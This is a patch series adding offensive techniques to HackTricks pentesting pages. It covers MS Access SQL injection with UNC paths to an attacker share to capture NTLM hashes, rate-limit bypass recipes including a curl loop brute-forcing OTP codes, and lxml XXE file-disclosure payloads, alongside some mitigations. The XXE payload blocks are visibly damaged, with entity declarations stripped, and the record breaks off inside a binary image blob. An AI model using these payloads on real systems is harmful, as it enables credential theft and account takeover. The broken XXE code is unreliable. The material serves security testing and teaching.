From 5695cc5633a8c6ac8f7b7d49dfdf1d1e4e904159 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 10 Jul 2025 08:30:55 +0000 Subject: [PATCH 1/8] Add content from: Research Update: Enhanced src/pentesting-web/sql-injection/m... --- .../sql-injection/ms-access-sql-injection.md | 62 ++++++++++++++++--- 1 file changed, 54 insertions(+), 8 deletions(-) diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md index c44e6b564..913a7a03f 100644 --- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md +++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md @@ -4,7 +4,7 @@ ## Online Playground -- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format\&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1) +- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1) ## DB Limitations @@ -127,9 +127,21 @@ IIF((select mid(last(username),1,1) from (select top 10 username from users))='a In a nutshell, the query uses an “if-then” statement in order to trigger a “200 OK” in case of success or a “500 Internal Error” otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only. On such value, using the MID operator, it is possible to perform a simple character comparison. Properly changing the index of MID and TOP, we can dump the content of the “username” field for all rows. -### Time Based +### Time-Based (Blind) Tricks -Check [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN]() +Jet/ACE SQL itself does **not** expose a native `SLEEP()` or `WAITFOR` function, so traditional time-based blind injections are limited. However, you can still introduce a measurable delay by forcing the engine to access a **network resource that is slow or does not answer**. Because the engine will try to open the file before returning the result, the HTTP response time reflects the round-trip latency to the attacker-controlled host. + +```sql +' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'-- +``` + +Point the UNC path to: + +* a SMB share behind a high-latency link +* a host that drops the TCP handshake after `SYN-ACK` +* a firewall sinkhole + +The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0 ### Other Interesting functions @@ -162,7 +174,7 @@ However, note that is very typical to find SQL Injections where you **don't have The knowledge of the **web root absolute path may facilitate further attacks**. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database. -`http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00` +`http://localhost/script.asp?id=1'+ '+UNION+SELECT+1+FROM+FakeDB.FakeTable%00` MS Access responds with an **error message containing the web directory full pathname**. @@ -182,7 +194,42 @@ Another way to enumerate files consists into **specifying a database.table item* `http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00` -Where **name\[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename. +Where **name[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename. + +### Remote Database Access & NTLM Credential Theft (2023) + +Since Jet 4.0 every query can reference a table located in a *different* `.mdb/.accdb` file via the `IN ''` clause: + +```sql +SELECT first_name FROM Employees IN '\\server\share\hr.accdb'; +``` + +If user input is concatenated into the part after **IN** (or into a `JOIN … IN` / `OPENROWSET` / `OPENDATASOURCE` call) an attacker can specify a **UNC path** that points to a host they control. The engine will: + +1. try to authenticate over SMB / HTTP to open the remote database; +2. leak the web-server’s **NTLM credentials** (forced authentication); +3. parse the remote file – a malformed or malicious database can trigger Jet/ACE memory-corruption bugs that have been patched multiple times (e.g. CVE-2021-28455). + +Practical injection example: + +```sql +1' UNION SELECT TOP 1 name + FROM MSysObjects + IN '\\attacker\share\poc.mdb'-- - +``` + +Impact: + +* Out-of-band exfiltration of Net-NTLMv2 hashes (usable for relay or offline cracking). +* Potential remote code execution if a new Jet/ACE parser bug is exploited. + +Mitigations (recommended even for legacy Classic ASP apps): + +* Add the registry value `AllowQueryRemoteTables = 0` under `HKLM\Software\Microsoft\Jet\4.0\Engines` (and under the equivalent ACE path). This forces Jet/ACE to reject remote paths starting with `\\`. +* Block outbound SMB/WebDAV at the network boundary. +* Sanitize / parameterise any part of a query that may end up inside an `IN` clause. + +The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0 ### .mdb Password Cracker @@ -191,8 +238,7 @@ Where **name\[i] is a .mdb filename** and **realTable is an existent table** wit ## References - [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) +- [Microsoft KB5002984 – Configuring Jet/ACE to block remote tables](https://support.microsoft.com/en-gb/topic/kb5002984-configuring-jet-red-database-engine-and-access-connectivity-engine-to-block-access-to-remote-databases-56406821-30f3-475c-a492-208b9bd30544) +- [Check Point Research – Abusing Microsoft Access Linked Tables for NTLM Forced Authentication (2023)](https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/) {{#include ../../banners/hacktricks-training.md}} - - - From a53839b788f29023fdc99afca73999531408187f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 11 Jul 2025 01:30:33 +0000 Subject: [PATCH 2/8] Add content from: Research Update: Enhanced src/pentesting-web/rate-limit-bypa... --- .../reversing-native-libraries.md | 8 +- src/pentesting-web/rate-limit-bypass.md | 73 +++++++++++++++++-- 2 files changed, 72 insertions(+), 9 deletions(-) diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 03213da50..ea060841d 100644 --- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -61,7 +61,7 @@ Java.perform(function () { }); }); ``` -Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. citeturn5search2turn5search0 +Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. --- @@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) | Year | CVE | Affected library | Notes | |------|-----|------------------|-------| -|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0| +|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| | |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.| When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant. @@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their ### References -- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) citeturn5search0 -- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0 +- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) +- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/rate-limit-bypass.md b/src/pentesting-web/rate-limit-bypass.md index 615692401..30c40cecf 100644 --- a/src/pentesting-web/rate-limit-bypass.md +++ b/src/pentesting-web/rate-limit-bypass.md @@ -54,11 +54,74 @@ If the target system applies rate limits on a per-account or per-session basis, Note that even if a rate limit is in place you should try to see if the response is different when the valid OTP is sent. In [**this post**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732), the bug hunter discovered that even if a rate limit is triggered after 20 unsuccessful attempts by responding with 401, if the valid one was sent a 200 response was received. -### Tools +--- -- [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): hashtag-fuzz is a fuzzing tool designed to test and bypass WAFs and CDNs. By leveraging advanced features such as random User-Agent and header value, random delays, handle multi-threading, selective chunking of wordlists and Round Robin proxy rotation for each chunked, it offers a robust solution for security professionals aiming to identify vulnerabilities in web applications. +### Abusing HTTP/2 multiplexing & request pipelining (2023-2025) + +Modern rate–limiter implementations frequently count **TCP connections** (or even individual HTTP/1.1 requests) instead of the *number of HTTP/2 streams* a connection contains. When the same TLS connection is reused, an attacker can open hundreds of parallel streams, each carrying a separate request, while the gateway only deducts *one* request from the quota. + +```bash +# Send 100 POST requests in a single HTTP/2 connection with curl +seq 1 100 | xargs -I@ -P0 curl -k --http2-prior-knowledge -X POST \ + -H "Content-Type: application/json" \ + -d '{"code":"@"}' https://target/api/v2/verify &>/dev/null +``` + +If the limiter protects only `/verify` but not `/api/v2/verify`, you can also combine **path confusion** with HTTP/2 multiplexing for *extremely* high-speed OTP or credential brute-forcing. + +> 🐾 **Tip:** PortSwigger’s [Turbo Intruder](https://portswigger.net/research/turbo-intruder) supports HTTP/2 and lets you fine-tune `maxConcurrentConnections` and `requestsPerConnection` to automate this attack. + +### GraphQL aliases & batched operations + +GraphQL allows the client to send **several logically independent queries or mutations in a single request** by prefixing them with *aliases*. Because the server executes every alias but the rate-limiter often counts only *one* request, this is a reliable bypass for login or password-reset throttling. + +```graphql +mutation bruteForceOTP { + a: verify(code:"111111") { token } + b: verify(code:"222222") { token } + c: verify(code:"333333") { token } + # … add up to dozens of aliases … +} +``` + +Look at the response: exactly one alias will return 200 OK when the correct code is hit, while the others are rate-limited. + +The technique was popularised by PortSwigger’s research on “GraphQL batching & aliases” in 2023 and has been responsible for many recent bug-bounty payouts. + +### Abuse of *batch* or *bulk* REST endpoints + +Some APIs expose helper endpoints such as `/v2/batch` or accept an **array of objects** in the request body. If the limiter is placed in front of the *legacy* endpoints only, wrapping multiple operations inside a single bulk request may completely sidestep the protection. + +```json +[ + {"path": "/login", "method": "POST", "body": {"user":"bob","pass":"123"}}, + {"path": "/login", "method": "POST", "body": {"user":"bob","pass":"456"}} +] +``` + +### Timing the sliding-window + +A classic token-bucket or leaky-bucket limiter *resets* on a fixed time boundary (for example, every minute). If the window is known (e.g. via error messages such as `X-RateLimit-Reset: 27`), fire the maximum allowed number of requests **just before** the bucket resets, then immediately fire another full burst. + +``` +|<-- 60 s window ‑->|<-- 60 s window ‑->| + ###### ###### +``` + +This simple optimisation can more than double your throughput without touching any other bypass technique. + +--- + +## Tools + +- [**https://github.com/Hashtag-AMIN/hashtag-fuzz**](https://github.com/Hashtag-AMIN/hashtag-fuzz): Fuzzing tool that supports header randomisation, chunked word-lists and round-robin proxy rotation. +- [**https://github.com/ustayready/fireprox**](https://github.com/ustayready/fireprox): Automatically creates disposable AWS API Gateway endpoints so every request originates from a different IP address – perfect for defeating IP-based throttling. +- **Burp Suite – IPRotate + extension**: Uses a pool of SOCKS/HTTP proxies (or AWS API Gateway) to rotate the source IP transparently during *Intruder* and *Turbo Intruder* attacks. +- **Turbo Intruder (BApp)**: High-performance attack engine supporting HTTP/2 multiplexing; tune `requestsPerConnection` to 100-1000 to collapse hundreds of requests into a single connection. + +## References + +- PortSwigger Research – “Bypassing rate limits with GraphQL aliasing” (2023) +- PortSwigger Research – “HTTP/2: The Sequel is Always Worse” (section *Connection-based throttling*) (2024) {{#include ../banners/hacktricks-training.md}} - - - From fd1ef027620596695475b5706b0c2fd75498430e Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 11 Jul 2025 18:37:22 +0000 Subject: [PATCH 3/8] Add content from: Dojo CTF Challenge #42: Hex Color Palette XXE File Disclosur... --- .../reversing-native-libraries.md | 8 +-- .../ios-pentesting-without-jailbreak.md | 2 +- .../sql-injection/ms-access-sql-injection.md | 4 +- .../xxe-xee-xml-external-entity.md | 67 +++++++++++++++++++ 4 files changed, 74 insertions(+), 7 deletions(-) diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 03213da50..ea060841d 100644 --- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -61,7 +61,7 @@ Java.perform(function () { }); }); ``` -Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. citeturn5search2turn5search0 +Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. --- @@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) | Year | CVE | Affected library | Notes | |------|-----|------------------|-------| -|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0| +|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| | |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.| When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant. @@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their ### References -- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) citeturn5search0 -- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0 +- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) +- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md index 004d7bf0e..791da2761 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md +++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md @@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth ### Automated dynamic analysis with MobSF (no jailbreak) -[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: +[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: ```bash docker pull opensecurity/mobile-security-framework-mobsf:latest diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md index 913a7a03f..5b9778a7a 100644 --- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md +++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md @@ -141,7 +141,7 @@ Point the UNC path to: * a host that drops the TCP handshake after `SYN-ACK` * a firewall sinkhole -The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0 +The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. ### Other Interesting functions @@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps): * Block outbound SMB/WebDAV at the network boundary. * Sanitize / parameterise any part of a query that may end up inside an `IN` clause. -The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0 +The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. ### .mdb Password Cracker diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md index 8b39a5e24..b689b1345 100644 --- a/src/pentesting-web/xxe-xee-xml-external-entity.md +++ b/src/pentesting-web/xxe-xee-xml-external-entity.md @@ -1,5 +1,10 @@ # XXE - XEE - XML External Entity +{{#include /banners/hacktricks-training.md}} + +- [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42) +- [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279) + {{#include ../banners/hacktricks-training.md}} ## XML Basics @@ -773,6 +778,65 @@ Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe- https://github.com/luisfontes19/xxexploiter {{#endref}} +### Python lxml Parameter-Entity XXE (Error-Based File Disclosure) + +> [!INFO] +> The Python library **lxml** uses **libxml2** under the hood. Versions prior to **lxml 5.4.0 / libxml2 2.13.8** still expand *parameter* entities even when `resolve_entities=False`, making them reachable when the application enables `load_dtd=True` and/or `resolve_entities=True`. This allows Error-Based XXE payloads that embed the contents of local files into the parser error message. + +#### 1. Exploiting lxml < 5.4.0 +1. Identify or create a *local* DTD on disk that defines an **undefined** parameter entity (e.g. `%config_hex;`). +2. Craft an internal DTD that: + * Loads the local DTD with ``. + * Redefines the undefined entity so that it: + - Reads the target file (``). + - Builds another parameter entity that refers to an **invalid path** containing the `%flag;` value and triggers a parser error (`">`). +3. Finally expand `%local_dtd;` and `%eval;` so that the parser encounters `%error;`, fails to open `/aaa/` and leaks the flag inside the thrown exception – which is often returned to the user by the application. + +```xml + + + "> + %eval;'> + %local_dtd; +]> +``` +When the application prints the exception the response contains: +``` +Error : failed to load external entity "file:///aaa/FLAG{secret}" +``` + +> [!TIP] +> If the parser complains about `%`/`&` characters inside the internal subset, double-encode them (`&#x25;` ⇒ `%`) to delay expansion. + +#### 2. Bypassing the lxml 5.4.0 hardening (libxml2 still vulnerable) +`lxml` ≥ 5.4.0 forbids *error* parameter entities like the one above, but **libxml2** still allows them to be embedded in a *general* entity. The trick is to: +1. Read the file into a parameter entity `%file`. +2. Declare another parameter entity that builds a **general** entity `c` whose SYSTEM identifier uses a *non-existent protocol* such as `meow://%file;`. +3. Place `&c;` in the XML body. When the parser tries to dereference `meow://…` it fails and reflects the full URI – including the file contents – in the error message. + +```xml + + "> + '> + %a; %b; +]> +&c; +``` + +#### Key takeaways +* **Parameter entities** are still expanded by libxml2 even when `resolve_entities` should block XXE. +* An **invalid URI** or **non-existent file** is enough to concatenate controlled data into the thrown exception. +* The technique works **without outbound connectivity**, making it ideal for strictly egress-filtered environments. + +#### Mitigation guidance +* Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**. +* Disable `load_dtd` and/or `resolve_entities` unless absolutely required. +* Avoid returning raw parser errors to the client. + ## References - [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf) @@ -784,4 +848,7 @@ https://github.com/luisfontes19/xxexploiter - [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) - [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7) +- [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42) +- [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279) + {{#include ../banners/hacktricks-training.md}} From cee232eead1959fe4cc70136abc9b11afb436e13 Mon Sep 17 00:00:00 2001 From: n0ll Date: Fri, 11 Jul 2025 18:07:01 -0400 Subject: [PATCH 4/8] nginx try_files directive with variables --- src/images/nginx_try_files.png | Bin 0 -> 194230 bytes .../pentesting-web/nginx.md | 55 ++++++++++++++++++ 2 files changed, 55 insertions(+) create mode 100644 src/images/nginx_try_files.png diff --git a/src/images/nginx_try_files.png b/src/images/nginx_try_files.png new file mode 100644 index 0000000000000000000000000000000000000000..0c14e95c9adec06ad79a9b6ec2a3dff5c8da361b GIT binary patch literal 194230 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 